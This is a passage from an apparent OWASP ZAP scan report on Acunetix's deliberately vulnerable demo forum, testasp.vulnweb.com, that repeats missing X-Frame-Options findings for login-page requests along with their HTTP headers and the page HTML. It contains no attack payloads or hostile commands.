<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=75 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=76 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=77 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=78 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=79 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=80 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=81 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 